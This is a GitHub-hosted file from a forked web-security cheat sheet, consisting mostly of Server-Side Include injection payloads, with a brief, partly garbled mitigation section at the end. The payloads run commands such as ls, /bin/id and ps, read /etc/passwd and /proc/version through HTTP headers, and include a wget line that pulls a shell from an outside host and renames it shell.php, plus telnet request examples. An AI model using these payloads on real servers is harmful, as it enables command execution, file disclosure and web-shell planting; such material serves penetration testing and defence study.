forked from imran-parray/Web-Sec-CheatSheet
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathSSI
73 lines (45 loc) · 1.38 KB
/
SSI
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
Current Data
============
<!--#echo var="DATE_LOCAL" -->
List The files
==============
<!--#exec cmd="ls" -->
Access Different Sites
======================
<!--#exec cmd="cd /root/dir/">
<!--#exec cmd="cd /root/dir/;ls">
<!--#exec cmd="cd /root/dir/;ls;cat /etc/passwd">
download Shell on Website
=========================
<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->
Injection in HTTP Headers
=========================
GET / HTTP/1.0
Referer: <!--#exec cmd="/bin/ps ax"-->
User-Agent: <!--#include virtual="/proc/version"-->
Example:
=======
su-2.05# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Referer: <!--#virtual include="somefile.log"-->
User-Agent: <!--#exec cmd="/bin/id"-->
Inserting Javascripts
======================
su-2.05# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Referer: <javascript-that-is-evil-so-there's-no-need-for-examples>
User-Agent: </html>
Solution:
=========
1.(BEST WAY) Stripping out metacharacters like <>":;'}{][|\)(*&^%$#!`
This can help prevent html, JavaScript, php, sql injection,
and SSI insertion.
2. Replacing < and > with > <
By replacing < and > with < and > this helps prevent tag execution.
One obvious problem would be scripts with potential backtick "`" problems.